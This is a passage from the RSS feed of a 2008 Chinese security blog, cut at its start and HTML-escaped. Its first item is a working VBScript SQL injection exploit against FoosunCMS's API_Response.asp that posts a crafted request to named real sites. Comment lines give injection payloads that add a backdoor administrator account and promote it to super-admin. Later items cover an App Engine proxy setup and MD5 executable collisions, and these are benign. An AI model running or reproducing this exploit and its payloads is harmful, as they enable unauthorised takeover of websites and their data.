Rem    风讯4.0 sp5[mssql] 注入漏洞测试脚本 By Tr4c3[at]126[dot]com&lt;br /&gt;
Rem    更多信息请关注:&lt;br /&gt;
Rem       网安阵线 &lt;a href=&quot;http://www.nspcn.org/&quot;&gt;http://www.nspcn.org/&lt;/a&gt;&lt;br /&gt;
Rem       web安全手册 &lt;a href=&quot;http://www.tr4c3.com/&quot;&gt;http://www.tr4c3.com/&lt;/a&gt;&lt;br /&gt;
Rem       BK瞬间[qq群]&lt;br /&gt;
Rem    转载请保留以上版权&lt;br /&gt;
Dim strData, strUrl, strGetinfo, xPost&lt;br /&gt;
strData = &quot;&amp;lt;body&amp;gt;&amp;lt;userip&amp;gt;999.999.999.999&amp;lt;/userip&amp;gt;&amp;lt;email&amp;gt;body@baidu.com&amp;lt;/email&amp;gt;&amp;lt;action&amp;gt;checkname&amp;lt;/action&amp;gt;&amp;lt;syskey&amp;gt;b77c8e0d7a0784d5&amp;lt;/syskey&amp;gt;&amp;lt;appid&amp;gt;FoosunCMS&amp;lt;/appid&amp;gt;&amp;lt;username&amp;gt;'&amp;lt;/username&amp;gt;&amp;lt;/body&amp;gt;&quot;&lt;br /&gt;
strUrl = &quot;&lt;a href=&quot;http://www.luohe.com.cn/api/API_Response.asp&quot;&gt;http://demo.foosun.net/api/API_Response.asp&lt;/a&gt;&quot;&lt;br /&gt;
Set xPost = CreateObject(&quot;Microsoft.XMLHTTP&quot;)&lt;br /&gt;
xPost.Open &quot;POST&quot;, strUrl, False&lt;br /&gt;
xPost.SetRequestHeader &quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded&quot;&lt;br /&gt;
xPost.SetRequestHeader &quot;Referer&quot;, strUrl&lt;br /&gt;
xPost.send(strData)&lt;br /&gt;
'strGetinfo = xPost.ResponseText&lt;br /&gt;
strGetinfo = bytes2BSTR(xPost.ResponseBody)&lt;br /&gt;
Wscript.echo(strGetinfo)&lt;br /&gt;
Wscript.Quit&lt;br /&gt;
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;/p&gt;
&lt;p&gt;Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;br /&gt;
Rem    将返回内容转换成简体中文&lt;br /&gt;
Function bytes2BSTR(vIn)&lt;br /&gt;
strReturn = &quot;&quot;&lt;br /&gt;
For i = 1 To LenB(vIn)&lt;br /&gt;
ThisCharCode = AscB(MidB(vIn,i,1))&lt;br /&gt;
If ThisCharCode &amp;lt; &amp;amp;H80 Then&lt;br /&gt;
strReturn = strReturn &amp;amp; Chr(ThisCharCode)&lt;br /&gt;
Else&lt;br /&gt;
NextCharCode = AscB(MidB(vIn,i+1,1))&lt;br /&gt;
strReturn = strReturn &amp;amp; Chr(CLng(ThisCharCode) * &amp;amp;H100 + CInt(NextCharCode))&lt;br /&gt;
i = i + 1&lt;br /&gt;
End If&lt;br /&gt;
Next&lt;br /&gt;
bytes2BSTR = strReturn&lt;br /&gt;
End Function&lt;br /&gt;
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;/p&gt;
&lt;p&gt;Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;br /&gt;
Rem ';insert into FS_MF_Admin (Admin_Name,Admin_Pass_Word)values('Tr4c3','83aa400af464c76d')-- 添加一个普通管理员Tr4c3,密码12345678&lt;br /&gt;
Rem ';update FS_MF_Admin set Admin_Is_Super=1 where Admin_Name='Tr4c3'-- 把Tr4c3提升为超级管理员&lt;br /&gt;
Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2112.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/tools&quot; title=&quot;显示工具收集的所有日志&quot; rel=&quot;category tag&quot;&gt;工具收集&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2112.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2112.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2112.html&amp;amp;title=FoosunCMS Sql Injection Vulnerability&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2112.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2112.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2112.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1473.html&quot; title=&quot;谈VBS在Hacking中的作用———SQL Inject中的应用 (2007/11/17)&quot;&gt;谈VBS在Hacking中的作用———SQL Inject中的应用&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/767.html&quot; title=&quot;被小菜们忽略的SQL注入技巧 (2006/12/08)&quot;&gt;被小菜们忽略的SQL注入技巧&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1391.html&quot; title=&quot;突破SQL注入限制的一点想法 (2007/10/10)&quot;&gt;突破SQL注入限制的一点想法&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/2082.html&quot; title=&quot;深入挖掘ORACLE内部SQLINJECTION (2008/06/19)&quot;&gt;深入挖掘ORACLE内部SQLINJECTION&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/912.html&quot; title=&quot;注入中转站 (2007/02/23)&quot;&gt;注入中转站&lt;/a&gt; (0)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/cd0f3b8a71a7f3967e25ba9a67d4b865&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/cd0f3b8a71a7f3967e25ba9a67d4b865/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2112.html/feed</wfw:commentRss><description>--==+=================== www.nspcn.org =================+==--
--==+ FoosunCMS (API_Response.asp) Remote SQL Injection Exploit +==--
--==+===================================================+==--
#Author: Tr4c3[at]126[dot]com
#版权所有: http://www.nspc...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/cd0f3b8a71a7f3967e25ba9a67d4b865&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/cd0f3b8a71a7f3967e25ba9a67d4b865/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>工具收集</category><category>SQL Injection</category><category>FoosunCMS</category><pubDate>Sun, 29 Jun 2008 13:14:54 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2112.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2112</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2112.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/88593224/1230972</fs:itemid></item><item><title>利用App Engine架设自己的Proxy</title><link>http://huaidan.org/archives/2111.html</link><content:encoded>&lt;p&gt;来源：Q's blog&lt;/p&gt;
&lt;p&gt;这里只是说一下个人的架设经过。&lt;br /&gt;
首先说一下我用的是Vista。&lt;br /&gt;
下载并安装Python环境。（默认安装的）&lt;br /&gt;
&lt;a href=&quot;http://python.org/download/&quot;&gt;http://python.org/download&lt;/a&gt;&lt;br /&gt;
我用的是 Python 2.5.2 Windows installer&lt;br /&gt;
下载并安装Google App Engine SDK。（默认安装的）&lt;br /&gt;
&lt;a href=&quot;http://code.google.com/appengine/downloads.html&quot;&gt;http://code.google.com/appengine/downloads.html&lt;/a&gt;&lt;br /&gt;
下载gappproxy。&lt;br /&gt;
&lt;a href=&quot;http://code.google.com/p/gappproxy/source/browse/trunk/&quot;&gt;http://code.google.com/p/gappproxy/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;下载app.yaml.fragment，fetch.py，proxy.py三个文件。&lt;br /&gt;
&lt;span id=&quot;more-2111&quot;&gt;&lt;/span&gt;&lt;br /&gt;
在Google App Engine SDK安装目录里新建文件夹daili，把上边的三个文件拷贝到该文件夹。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://i3.6.cn/cvbnm/26/1d/36/c9961267d75ee7cfcae5ba59b28cd8a1.jpg&quot; alt=&quot;&quot; /&gt;&lt;br /&gt;
把app.yaml.fragment改名为app.yaml, 并用编辑器打开，修改内容如下：&lt;br /&gt;
application: daili （为什么是daili呢，因为我的app engine是daili.appspot.com）&lt;br /&gt;
version: 1&lt;br /&gt;
runtime: python&lt;br /&gt;
api_version: 1&lt;/p&gt;
&lt;p&gt;handlers:&lt;br /&gt;
- url: /fetch.py&lt;br /&gt;
script: fetch.py&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://i3.6.cn/cvbnm/1c/bb/75/c0469bc7cfb0dbc0d7d8857211eb3084.jpg&quot; alt=&quot;&quot; /&gt;&lt;br /&gt;
	调出命令行&lt;br /&gt;
进入Google App Engine SDK目录&lt;br /&gt;
appcfg.py update daili&lt;br /&gt;
会提示你输入google帐户&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://i3.6.cn/cvbnm/ee/d4/3c/515c156542d80d6367568fbc857c2e76.jpg&quot; alt=&quot;&quot; /&gt;&lt;br /&gt;
	修改proxy.py文件&lt;br /&gt;
改成你的app engine 域名： 'http://daili.appspot.com/fetch.py'&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://i3.6.cn/cvbnm/61/b2/3d/3dc11990a9da5d8b31d4c96f557eea94.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;	双击运行proxy.py（使用代理期间不要关闭该窗口）&lt;br /&gt;
	打开Firefox，修改foxyproxy端口为8000&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://i3.6.cn/cvbnm/6f/ba/11/dc3825a6c5f271783e82d45ffc77bfe5.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;	OK，一切就绪，在Firefox地址栏输入 &lt;a href=&quot;http://quanmengli.tumblr.com/&quot;&gt;http://quanmengli.tumblr.com/&lt;/a&gt;，OMG！ 成功啦&lt;/p&gt;
&lt;p&gt;这个方法 仅支持标准80端口的HTTP协议，无法支持https及其他协议，这与Google App Engine平台限制有关。&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2111.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/technology&quot; title=&quot;显示技术文章的所有日志&quot; rel=&quot;category tag&quot;&gt;技术文章&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2111.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2111.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2111.html&amp;amp;title=利用App Engine架设自己的Proxy&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2111.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2111.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2111.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/483.html&quot; title=&quot;网站Alexa排名&amp;#038;Google PR查询 (2006/04/21)&quot;&gt;网站Alexa排名&amp;#038;Google PR查询&lt;/a&gt; (10)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/763.html&quot; title=&quot;终于申请到了Google Apps for Your Domain (2006/12/08)&quot;&gt;终于申请到了Google Apps for Your Domain&lt;/a&gt; (8)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/550.html&quot; title=&quot;简洁版的Google搜索页面 (2006/07/20)&quot;&gt;简洁版的Google搜索页面&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/900.html&quot; title=&quot;利用“Google 手气不错”来做点事 (2007/02/12)&quot;&gt;利用“Google 手气不错”来做点事&lt;/a&gt; (4)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/644.html&quot; title=&quot;利用Google Code Search找出数据库密码 (2006/10/08)&quot;&gt;利用Google Code Search找出数据库密码&lt;/a&gt; (0)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/64de4b8b6eb289771c560380eb9b4cb2&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/64de4b8b6eb289771c560380eb9b4cb2/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2111.html/feed</wfw:commentRss><description>来源：Q's blog
这里只是说一下个人的架设经过。
首先说一下我用的是Vista。
下载并安装Python环境。（默认安装的）
http://python.org/download
我用的是 Python 2.5.2 Windows installer
下载并安装Google App Engin...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/64de4b8b6eb289771c560380eb9b4cb2&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/64de4b8b6eb289771c560380eb9b4cb2/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>Google App Engine</category><category>Google</category><category>技术文章</category><category>Proxy</category><pubDate>Sat, 28 Jun 2008 22:39:04 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2111.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2111</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2111.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/88450740/1230972</fs:itemid></item><item><title>可执行文件的 MD5 碰撞</title><link>http://huaidan.org/archives/2110.html</link><content:encoded>&lt;p&gt;来源：cnbeta&lt;/p&gt;
&lt;p&gt;原来我总是很自信地以为:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 一样,却又都能正常运行,并且可以做完全不同的事情么?&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;答:还真的可以.&lt;/span&gt;&lt;br /&gt;
&lt;span id=&quot;more-2110&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe&quot;&gt;http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe&quot;&gt;http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;这两个程序会在屏幕上打印出不同的字符，但是它们的 MD5 都是一样的。&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;通读其论文后摘要如下：&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;这几位密码学家使用的是“构造前缀碰撞法”（chosen-prefix collisions）来进行此次攻击（是王小云所使用的攻击方法的改进版本）。&lt;/p&gt;
&lt;p&gt;他们所使用的计算机是一台 Sony PS3，且仅用了不到两天。&lt;/p&gt;
&lt;p&gt;他们的结论：&lt;strong&gt;MD5 算法不应再被用于任何软件完整性检查或代码签名的用途。&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;另：现在，如果仅仅是想要生成 MD5 相同而内容不同的文件的话，在任何主流配置的电脑上用几秒钟就可以完成了。&lt;/p&gt;
&lt;p&gt;这几位密码学家编写的“快速 MD5 碰撞生成器”：&lt;a href=&quot;http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip&quot;&gt;http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip&lt;/a&gt;&lt;br /&gt;
源代码：&lt;a href=&quot;http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip&quot;&gt;http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip&lt;/a&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;a href=&quot;http://huaidan.org/archives/2110.html#addcomment&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;发表评论&lt;/strong&gt;&lt;/a&gt; | 分类：&lt;a href=&quot;http://huaidan.org/archives/category/others&quot; title=&quot;显示乱七八糟的所有日志&quot; rel=&quot;category tag&quot;&gt;乱七八糟&lt;/a&gt;&lt;br /&gt;
本文网址：&lt;a href=&quot;http://huaidan.org/archives/2110.html&quot; target=&quot;_blank&quot;&gt;http://huaidan.org/archives/2110.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;small&gt;&amp;copy; 鬼仔 for &lt;a href=&quot;http://huaidan.org&quot; target=&quot;_blank&quot;&gt;鬼仔's Blog&lt;/a&gt;, 2008. | Add to &lt;a href=&quot;http://del.icio.us/post?url=http://huaidan.org/archives/2110.html&amp;amp;title=可执行文件的 MD5 碰撞&quot; target=&quot;_blank&quot;&gt;del.icio.us&lt;/a&gt; &lt;a href=&quot;http://www.digg.com/submit&quot; target=&quot;_blank&quot;&gt;digg&lt;/a&gt; | Who's linking ? &lt;a title=&quot;Search on Technorati&quot; href=&quot;http://www.technorati.com/search/http://huaidan.org/archives/2110.html&quot; target=&quot;_blank&quot;&gt;Technorati&lt;/a&gt; &lt;a title=&quot;Search on Google Blog Search&quot; href=&quot;http://google.com/blogsearch?q=http://huaidan.org/archives/2110.html&quot; target=&quot;_blank&quot;&gt;Google&lt;/a&gt; &lt;a title=&quot;Search on Blogpulse&quot; href=&quot;http://www.blogpulse.com/search?query=http://huaidan.org/archives/2110.html&quot; target=&quot;_blank&quot;&gt;BlogPulse&lt;/a&gt;. &lt;/small&gt;
	&lt;h4&gt;相关日志&lt;/h4&gt;
	&lt;ul class=&quot;st-related-posts&quot;&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/1776.html&quot; title=&quot;浅谈MD5和SHA-1被破解和应用改进策略 (2008/03/14)&quot;&gt;浅谈MD5和SHA-1被破解和应用改进策略&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/652.html&quot; title=&quot;What to do with an MD5 Hash? (2006/10/12)&quot;&gt;What to do with an MD5 Hash?&lt;/a&gt; (0)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/841.html&quot; title=&quot;MD5散列反查询系统下载（PHP+MYSQL/ASP+ACCESS） (2007/01/09)&quot;&gt;MD5散列反查询系统下载（PHP+MYSQL/ASP+ACCESS）&lt;/a&gt; (3)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/516.html&quot; title=&quot;MD5加强验证 挑战王小云破解 (2006/06/04)&quot;&gt;MD5加强验证 挑战王小云破解&lt;/a&gt; (6)&lt;/li&gt;
	&lt;li&gt;&lt;a href=&quot;http://huaidan.org/archives/2047.html&quot; title=&quot;Hashq 1.0 beta (2008/06/04)&quot;&gt;Hashq 1.0 beta&lt;/a&gt; (3)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/c0669993b91f7115746f5c81928bfde5&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/c0669993b91f7115746f5c81928bfde5/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</content:encoded><wfw:commentRss>http://huaidan.org/archives/2110.html/feed</wfw:commentRss><description>来源：cnbeta
原来我总是很自信地以为:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 一样,却又都能正常运行,并且可以做完全不同的事情么?
答:还真的可以.

http://www.win...&lt;br /&gt;&lt;!-- Feedsky ad --&gt;&lt;a href=&quot;http://feed.feedsky.com/~cpm/c/sunlei/c0669993b91f7115746f5c81928bfde5&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~cpm/sunlei/c0669993b91f7115746f5c81928bfde5/s.gif&quot; border=&quot;0&quot; style=&quot;margin-top:5px;&quot; /&gt;&lt;/a&gt;&lt;!-- /Feedsky ad --&gt;</description><category>md5</category><category>乱七八糟</category><pubDate>Sat, 28 Jun 2008 19:30:11 +0800</pubDate><author>鬼仔</author><comments>http://huaidan.org/archives/2110.html#comments</comments><guid isPermaLink="false">http://huaidan.org/?p=2110</guid><dc:creator>鬼仔</dc:creator><fs:srclink>http://huaidan.org/archives/2110.html</fs:srclink><fs:srcfeed>http://huaidan.org/feed</fs:srcfeed><fs:itemid>feedsky/sunlei/~7027661/88448180/1230972</fs:itemid></item></channel></rss>